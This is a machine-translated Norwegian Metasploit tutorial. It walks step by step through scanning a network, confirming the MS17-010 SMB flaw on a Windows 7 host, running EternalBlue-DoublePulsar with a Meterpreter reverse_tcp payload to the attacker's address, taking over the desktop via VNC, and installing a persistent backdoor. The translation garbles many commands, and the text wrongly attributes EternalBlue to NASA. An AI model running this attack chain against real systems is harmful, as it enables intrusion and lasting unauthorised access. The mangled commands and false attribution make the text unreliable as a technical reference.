Metasploit -opplæring

Metasploit -opplæring

Som vi har diskutert det 25 beste Kali Linux -verktøyet, og vi setter Metasploit med det første på listen, la oss nå diskutere og lære om Metasploit. Vi vil anbefale deg å være kjent med Metasploit.

Metasploit opprinnelig opprettet av H. D Moore i 2003, inntil den ble anskaffet og utviklet seg videre av Rapid7 21. oktober 2009. Metasploit-rammeverk er fullstendig skrevet med Ruby, og er en standardpakke installert i Kali Linux-systemet (og også nesten all penetrasjonstesting OS, antar jeg). Det er en hackere eller penetrasjonstestere favorittsett for å forske på sikkerhetsproblemer, utvikle og utføre utnyttelser på mål, og annen sikkerhetsutvikling.

Metasploit kommer med flere utgaver, vanligvis delt inn i to kategorier, gratis versjon og betalt versjon. The Free Versions: Metasploit Framework Community Edition (CLI -basert grensesnitt) og Armitage (GUI -basert grensesnitt). De betalte versjonene: Metasploit Express, Metasploit Pro og Cobalt Strike (det er på samme måte med Armitage, som er levert av Strategic Cyber ​​LLC).

Metasploit lar brukere opprette (eller utvikle) sin egen utnyttelseskode, men ikke bekymre deg hvis du ikke vet hvordan du skal kode, Metasploit har så mange moduler og de blir kontinuerlig oppdatert. For tiden har Metasploit over 1600 utnyttelser og 500 nyttelast. Den enkle måten å forstå hva som er utnyttelser og nyttelast, en utnyttelse er i utgangspunktet hvordan angriperen leverer nyttelasten, gjennom sårbarhetshullet i målsystemet. Når angriperen lanserer utnyttelsen som inneholder en nyttelast mot sårbart mål, så er nyttelasten utplassert (nyttelast som brukes til å koble seg tilbake til angriperen for å få ekstern tilgang mot målsystem), i dette stadiet er utnyttelsen gjort, og blir irrelevant.

"Metasploit har ikke øyeblikkelig verktøy, det er en sinnssyk ramme"

Denne Metasploit -artikkelen handler om å utføre penetrasjonstesting mot et målsystem ved å bruke følgende flyt:

  • Sårbarhetsskanning
  • Sårbarhetsvurdering
  • Utnytte
  • Få ekstern tilgang - Eier systemet

FORBEREDELSE

Forsikre deg om at Kali Linux vår har den siste oppdaterte versjonen. Det vil være forbedringer i hver oppdatering. Kjør følgende kommandoer:

~# APT -oppdatering
~# apt oppgradering -y
~# apt dist -upgrade -y

Når maskinen vår er oppdatert, kan vi nå begynne med å skyte opp Metasploit -konsollen. I terminalen, type:

~# MSFConsole

Og du trenger også en tekstredigerer, Gedit eller Leafpad, for å samle inn litt informasjon underveis før vi sammenstiller angrepet. For det første, identifiser din IP -adresse til det trådløse grensesnittet, ruterenes IP og nettmasken.

Basert på informasjonen ovenfor, notatet WLAN1 og Router IP -adresse, og NetMask. Så lappen skal se slik ut:

Angriper IP (Lhost): 192.168.1.56
Gateway / Routers IP: 192.168.1.1
Netmask: 255.255.255.0 (/24)


Trinn 1: Skanning av sårbarhet

I Metasploit -konsollen samler vi først informasjon, for eksempel Target IP -adresse, operativsystem, porter åpnet og sårbarheten. Metasploit lar oss kjøre NMAP direkte fra konsollen. Basert på informasjonen over kjører denne kommandoen for å utføre vår informasjonssamlingsoppgave.

MSF> NMAP -V 192.168.1.1/24 -Script vuln -pn -o

Fra kommandoen over fikk vi resultatet nedenfor.

Vi fikk et sårbart mål som kjører Windows -operativsystem, og det sårbare er på SMBV1 -tjenesten. Så legg til å merke deg.

Target IP (RHOST): 192.168.1.57
Sårbarhet: Sårbarhet for ekstern kode Utførelse i Microsoft SMBV1-servere (MS17-010)


Trinn 2: Sårbarhetsvurdering

Nå kjenner vi målet og dets sårbarhet. La oss sjekke sårbarheten i Metasploit -konsollen

Nå kjenner vi målet og dets sårbarhet. La oss sjekke sårbarheten i Metasploit -konsollen ved hjelp av SMB_Scanner Auxiliary Module. Kjør følgende kommando:

MSF> Bruk hjelpestoffer/skanner/SMB/SMB_MS17_010
MSF Auxiliary (SMB_MS17_010)> Sett Rhosts [Target IP]
MSF Auxiliary (SMB_MS17_010)> Kjør

Metasploit er trygg på sårbarheten, og det viser den eksakte Windows OS -utgaven. Legg til å merke:

Target OS: Windows 7 Ultimate 7600


Trinn 3: Utnyttelse

Uheldigvis har Metasploit ingen utnyttelsesmodul relatert til denne sårbarheten. Men ikke bekymre deg, det er en fyr utenfor utsatt og skrev utnyttelseskoden. Utnyttelsen er kjent, siden det initieres av NASA, kalles det EternalBlue-Doublepulsar. Du kan ta tak i den herfra, eller du kan følge guiden fra opplæringsvideoen nedenfor for å installere utnyttelseskoden til Metasploit -rammen.

Når du har fulgt langs guiden over, (sørg for at banen er den samme som opplæringen). Nå er du klar til å utnytte målet. Kjør følgende kommandoer:

Bruk utnyttelse/Windows/SMB/EternalBlue_DoublePulsar
Angi nyttelastvinduer/meterpreter/reverse_tcp
Sett prosessinject spoolsv.EXE
Sett Rhost 192.168.1.57
Sett Lhost 192.168.1.56

Utnytte

Boom ... Utnyttelsen lykkes, vi fikk meterpreter -økt. Som jeg nevnte tidligere, når utnyttelsen ble lansert, vil den distribuere nyttelasten, som er her vi brukte, Windows/Meterpreter/revers_tcp.


Trinn 4: Få ekstern tilgang

La oss utforske de mer tilgjengelige kommandoene, skriv inn '?'(uten spørsmålstegn) og se oppførte tilgjengelige kommandoer. De Stdapi, Systemkommandoer er:

For å se mer informasjon om målsystemet, bruk 'sysinfo'Kommando. Utgangen skal se slik ut.

Siden vi injiserer til systemprosess tidligere (spoolsv.exe), vi fikk systemrettighet. Vi eier målet. Vi kan gjøre mye med kommandoen til målet. For eksempel kunne vi kjøre RDP, eller bare angi VNC -fjernkontroll. For å kjøre VNC Service Enter -kommando:

~# Kjør VNC

Resultatet skal være målmaskinens skrivebord, det ser slik ut.

Den viktigste delen er å lage en bakdør, så når målet er koblet til maskinen vår, vil målmaskinen prøve å koble seg tilbake, igjen til oss. Bakdør brukes til å opprettholde tilgang, det er som fiske, du vil ikke kaste fisken din tilbake til vannet når du har fått fisken, ikke sant? Du vil gjøre noe med fisken, enten du skal redde den i kjøleskap for ytterligere handlinger, som å lage mat eller selge den for penger.

Meterpreter har denne vedvarende bakdørsfunksjonen. Kjør følgende kommando, og se på de tilgjengelige parametrene og argumentene.

Meterpreter> Kjør utholdenhet -H

Hvis du ikke er komfortabel med dette utdaterte skriptet, er den nyeste utholdenhetsmodulen under Post/Windows/Administrer/Persistence_exe. Du kan utforske det videre.

Metasploit er enorm, det er ikke bare et verktøy, det er et rammeverk, vurderer at det har over 1600 utnyttelser og omtrent 500 nyttelast. En artikkel er bare egnet til det store bildet av den generelle bruken eller ideen. Men du har lært så mye av denne artikkelen.

“Jo mer du følger angrepsstrømmen, jo mer har du uanstrengt utfordring.”